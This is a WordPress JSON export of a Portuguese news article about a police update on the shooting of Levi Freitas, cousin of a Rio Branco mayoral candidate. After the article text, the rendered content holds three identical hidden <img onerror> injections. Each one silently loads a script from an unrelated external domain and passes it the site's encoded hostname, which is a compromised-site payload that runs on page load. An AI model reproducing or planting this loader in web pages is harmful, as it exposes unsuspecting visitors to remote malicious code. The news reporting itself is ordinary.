{"id":50953,"date":"2020-11-03T18:42:04","date_gmt":"2020-11-03T18:42:04","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/11\/03\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/"},"modified":"2020-11-03T18:42:04","modified_gmt":"2020-11-03T18:42:04","slug":"delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/","title":{"rendered":"Delegado fala sobre caso da morte do primo de Kinpara"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Casas descarta que assassinato tenha motiva\u00e7\u00e3o pol\u00edtica<\/span><\/p>\n<p style=\"text-align: justify;\">O delegado Ricardo Casas, que est\u00e1 a frente das investiga\u00e7\u00f5es envolvendo a morte de Levi Freitas, 38 anos, no dia 22 de outubro deste ano, falou sobre o andamento do inqu\u00e9rito.<\/p>\n<p style=\"text-align: justify;\">Segundo o delegado, o vi\u00e9s pol\u00edtico foi descartado e a investiga\u00e7\u00e3o aponta para outra motiva\u00e7\u00e3o, \u201ca gente j\u00e1 t\u00e1 ouvindo algumas testemunhas, analisando algumas imagens e a pol\u00edcia est\u00e1 tomando todas as medidas necess\u00e1rias e poss\u00edveis para a gente identificar esses autores\u201d.<\/p>\n<p style=\"text-align: justify;\">At\u00e9 o momento o que se sabe \u00e9 que 4 pessoas teriam participa\u00e7\u00e3o direta na morte de Levi. \u201cInicialmente a gente tem essa informa\u00e7\u00e3o de quatro pessoas no entanto n\u00e3o se descarta a participa\u00e7\u00e3o de outras pessoas que poderiam ter participado de forma indireta\u201d, disse Casas.<\/p>\n<p style=\"text-align: justify;\">O delegado pede ainda para quem tiver qualquer informa\u00e7\u00e3o sobre o caso que denuncie \u00e0 pol\u00edcia, mesmo que de forma an\u00f4nima.<\/p>\n<p style=\"text-align: justify;\">Entenda o caso<\/p>\n<p style=\"text-align: justify;\">Levi era primo do candidato \u00e0 prefeitura de Rio Branco, Minoru Kinpara, e foi morto no bairro H\u00e9lio Melo (conhecido por Sapol\u00e2ndia), no dia 22 de outubro deste ano.<\/p>\n<p style=\"text-align: justify;\">Segundo testemunhas, a v\u00edtima estava na frente de casa tomando terer\u00e9 com amigos quando quatro homens se aproximaram e Levi se afastou para conversar com o grupo.<\/p>\n<p style=\"text-align: justify;\">Minutos depois, foi poss\u00edvel ouvir uma discuss\u00e3o e o grupo arrastando a v\u00edtima. Levi tentou fugir, mas quando correu os suspeitos efetuaram v\u00e1rios disparos contra ele.<\/p>\n<p style=\"text-align: justify;\">A v\u00edtima caiu na \u00e1rea de casa e morreu na hora. O Servi\u00e7o de Atendimento M\u00f3vel de Urg\u00eancia (Samu) foi acionado, mas chegando ao local s\u00f3 pode confirmar o \u00f3bito.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Casas descarta que assassinato tenha motiva\u00e7\u00e3o pol\u00edtica<\/span><\/p>\n","protected":false},"author":4,"featured_media":50952,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-50953","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Delegado fala sobre caso da morte do primo de Kinpara - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Delegado fala sobre caso da morte do primo de Kinpara - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Casas descarta que assassinato tenha motiva\u00e7\u00e3o pol\u00edtica\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-11-03T18:42:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/11\/03-11-2020_Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara.png\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/\",\"name\":\"Delegado fala sobre caso da morte do primo de Kinpara - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/11\/03-11-2020_Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara.png\",\"datePublished\":\"2020-11-03T18:42:04+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/11\/03-11-2020_Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara.png\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/11\/03-11-2020_Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara.png\",\"width\":458,\"height\":340,\"caption\":\"03-11-2020 Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Delegado fala sobre caso da morte do primo de Kinpara\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Delegado fala sobre caso da morte do primo de Kinpara - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/","og_locale":"pt_BR","og_type":"article","og_title":"Delegado fala sobre caso da morte do primo de Kinpara - Agazeta.net","og_description":"Casas descarta que assassinato tenha motiva\u00e7\u00e3o pol\u00edtica","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/","og_site_name":"Agazeta.net","article_published_time":"2020-11-03T18:42:04+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/11\/03-11-2020_Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara.png","type":"image\/png"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/","name":"Delegado fala sobre caso da morte do primo de Kinpara - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/11\/03-11-2020_Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara.png","datePublished":"2020-11-03T18:42:04+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/11\/03-11-2020_Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara.png","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/11\/03-11-2020_Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara.png","width":458,"height":340,"caption":"03-11-2020 Delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-Kinpara"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/delegado-fala-sobre-caso-envolvendo-morte-de-primo-de-kinpara\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Delegado fala sobre caso da morte do primo de Kinpara"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50953","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=50953"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/50953\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/50952"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=50953"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=50953"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=50953"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}